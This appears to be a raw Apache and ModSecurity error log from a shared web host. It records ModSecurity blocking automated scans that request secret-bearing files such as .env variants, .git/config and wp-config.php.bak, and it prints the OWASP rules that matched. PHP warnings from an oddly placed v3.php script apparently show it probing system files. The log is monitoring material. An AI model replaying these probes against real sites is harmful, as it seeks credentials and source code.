[Mon May 11 16:07:16.224797 2026] [core:error] [pid 1319886:tid 1319916] [client 4.193.137.131:17413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:16.700975 2026] [core:error] [pid 1319885:tid 1319891] [client 4.193.137.131:18390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:16.701015 2026] [core:error] [pid 1319885:tid 1319891] [client 4.193.137.131:18390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:17.177378 2026] [core:error] [pid 1319953:tid 1319977] [client 4.193.137.131:18403] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:17.178206 2026] [core:error] [pid 1319953:tid 1319977] [client 4.193.137.131:18403] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:17.691426 2026] [core:error] [pid 1319885:tid 1319893] [client 4.193.137.131:18427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:17.691464 2026] [core:error] [pid 1319885:tid 1319893] [client 4.193.137.131:18427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:18.181017 2026] [core:error] [pid 1319998:tid 1320009] [client 4.193.137.131:17418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:18.181048 2026] [core:error] [pid 1319998:tid 1320009] [client 4.193.137.131:17418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:18.688521 2026] [core:error] [pid 1320398:tid 1320423] [client 4.193.137.131:18408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:18.688649 2026] [core:error] [pid 1320398:tid 1320423] [client 4.193.137.131:18408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:19.175007 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:18415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:19.175047 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:18415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:19.673971 2026] [core:error] [pid 1319953:tid 1319965] [client 4.193.137.131:18375] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:19.673999 2026] [core:error] [pid 1319953:tid 1319965] [client 4.193.137.131:18375] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:20.154619 2026] [core:error] [pid 1320674:tid 1320710] [client 4.193.137.131:18385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:20.154655 2026] [core:error] [pid 1320674:tid 1320710] [client 4.193.137.131:18385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:20.668453 2026] [core:error] [pid 1319885:tid 1319912] [client 4.193.137.131:18392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:20.668489 2026] [core:error] [pid 1319885:tid 1319912] [client 4.193.137.131:18392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:42.609670 2026] [authz_core:error] [pid 1319998:tid 1320005] [client 176.120.22.46:58410] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/customize/error_log, referer: https://krakoukas.com/wp-includes/customize/
[Mon May 11 16:07:55.360806 2026] [authz_core:error] [pid 1320674:tid 1320703] [client 176.120.22.46:52719] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/html-api/error_log, referer: https://krakoukas.com/wp-includes/html-api/
[Mon May 11 16:08:27.454102 2026] [authz_core:error] [pid 1320398:tid 1320405] [client 176.120.22.46:62770] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/interactivity-api/error_log, referer: https://krakoukas.com/wp-includes/interactivity-api/
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/14/927ecfe0c603ccb7153250ef2f52f126145422 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/14/927ecfe0c603ccb7153250ef2f52f126145422 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/42/338ea72aa6d8b75688681ea0d4b45aa0e8f876 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/42/338ea72aa6d8b75688681ea0d4b45aa0e8f876 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:09:00.665422 2026] [security2:error] [pid 1319998:tid 1320000] [client 34.118.104.12:43230] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agHi_Kt2WtvoFr7xvGzkBAAAAIA"]
[Mon May 11 16:09:00.665926 2026] [security2:error] [pid 1319998:tid 1320000] [client 34.118.104.12:43230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.git/config"] [unique_id "agHi_Kt2WtvoFr7xvGzkBAAAAIA"]
[Mon May 11 16:09:01.926789 2026] [security2:error] [pid 1319998:tid 1320000] [client 34.118.104.12:43230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agHi_Kt2WtvoFr7xvGzkBAAAAIA"]
[Mon May 11 16:09:01.984390 2026] [security2:error] [pid 1319953:tid 1319977] [client 104.28.195.187:60066] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.git/HEAD"] [unique_id "agHi_eSQ-m-m0ukSShuQqQAAAVY"]
[Mon May 11 16:09:01.984915 2026] [security2:error] [pid 1319953:tid 1319977] [client 104.28.195.187:60066] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.git/HEAD"] [unique_id "agHi_eSQ-m-m0ukSShuQqQAAAVY"]
[Mon May 11 16:09:02.010072 2026] [security2:error] [pid 1320674:tid 1320695] [client 104.28.195.187:60060] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.git/config"] [unique_id "agHi_qO9RdIr1DwxYR2hcQAAAMU"]
[Mon May 11 16:09:02.010382 2026] [security2:error] [pid 1320674:tid 1320695] [client 104.28.195.187:60060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.git/config"] [unique_id "agHi_qO9RdIr1DwxYR2hcQAAAMU"]
[Mon May 11 16:09:02.052328 2026] [security2:error] [pid 1319953:tid 1319977] [client 104.28.195.187:60066] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHi_eSQ-m-m0ukSShuQqQAAAVY"]
[Mon May 11 16:09:02.071460 2026] [security2:error] [pid 1320674:tid 1320695] [client 104.28.195.187:60060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHi_qO9RdIr1DwxYR2hcQAAAMU"]
[Mon May 11 16:09:07.912600 2026] [security2:error] [pid 1319886:tid 1319917] [client 208.84.101.73:38602] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/backend/.env"] [unique_id "agHjA6y-5-wpj6Sx56aowgAAAAw"]
[Mon May 11 16:09:07.912786 2026] [security2:error] [pid 1320398:tid 1320421] [client 208.84.101.73:38586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/.env.local"] [unique_id "agHjA-JEyNRN152ArOSbmQAAAFU"]
[Mon May 11 16:09:07.912831 2026] [security2:error] [pid 1319886:tid 1319917] [client 208.84.101.73:38602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/backend/.env"] [unique_id "agHjA6y-5-wpj6Sx56aowgAAAAw"]
[Mon May 11 16:09:07.912944 2026] [security2:error] [pid 1320398:tid 1320421] [client 208.84.101.73:38586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/.env.local"] [unique_id "agHjA-JEyNRN152ArOSbmQAAAFU"]
[Mon May 11 16:09:07.925213 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/api/.env"] [unique_id "agHjA6t2WtvoFr7xvGzkFwAAAJU"]
[Mon May 11 16:09:07.925389 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/api/.env"] [unique_id "agHjA6t2WtvoFr7xvGzkFwAAAJU"]
[Mon May 11 16:09:07.925652 2026] [security2:error] [pid 1320674:tid 1321055] [client 208.84.101.73:38576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/.env"] [unique_id "agHjA6O9RdIr1DwxYR2hfAAAAMw"]
[Mon May 11 16:09:07.925807 2026] [security2:error] [pid 1320674:tid 1321055] [client 208.84.101.73:38576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/.env"] [unique_id "agHjA6O9RdIr1DwxYR2hfAAAAMw"]
[Mon May 11 16:09:07.926179 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/.env.production"] [unique_id "agHjA-SQ-m-m0ukSShuQtgAAAU8"]
[Mon May 11 16:09:07.926352 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/.env.production"] [unique_id "agHjA-SQ-m-m0ukSShuQtgAAAU8"]
[Mon May 11 16:09:08.019078 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/app/.env"] [unique_id "agHjBOSQ-m-m0ukSShuQtwAAAVA"]
[Mon May 11 16:09:08.019349 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/app/.env"] [unique_id "agHjBOSQ-m-m0ukSShuQtwAAAVA"]
[Mon May 11 16:09:09.552536 2026] [security2:error] [pid 1319998:tid 1320021] [client 208.84.101.73:38594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjA6t2WtvoFr7xvGzkFwAAAJU"]
[Mon May 11 16:09:10.061307 2026] [security2:error] [pid 1319953:tid 1319971] [client 208.84.101.73:38590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjBOSQ-m-m0ukSShuQtwAAAVA"]
[Mon May 11 16:09:10.069418 2026] [security2:error] [pid 1319886:tid 1319917] [client 208.84.101.73:38602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjA6y-5-wpj6Sx56aowgAAAAw"]
[Mon May 11 16:09:10.071792 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjA-SQ-m-m0ukSShuQtgAAAU8"]
[Mon May 11 16:09:10.115751 2026] [security2:error] [pid 1320398:tid 1320421] [client 208.84.101.73:38586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjA-JEyNRN152ArOSbmQAAAFU"]
[Mon May 11 16:09:10.308239 2026] [security2:error] [pid 1320674:tid 1321055] [client 208.84.101.73:38576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agHjA6O9RdIr1DwxYR2hfAAAAMw"]
[Mon May 11 16:09:12.971816 2026] [security2:error] [pid 1319953:tid 1319970] [client 208.84.101.73:38588] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "rixonephotography.com"] [uri "/wp-content/debug.log"] [unique_id "agHjCOSQ-m-m0ukSShuQvgAAAU8"]
[Mon May 11 16:09:12.971874 2026] [security2:error] [pid 1319886:tid 1319908] [client 208.84.101.73:38620] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php.bak"] [unique_id "agHjCKy-5-wpj6Sx56aoygAAAAY"]
[Mon May 11 16:09:12.972089 2026] [security2:error] [pid 1319886:tid 1319908] [client 208.84.101.73:38620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php.bak"] [unique_id "agHjCKy-5-wpj6Sx56aoygAAAAY"]
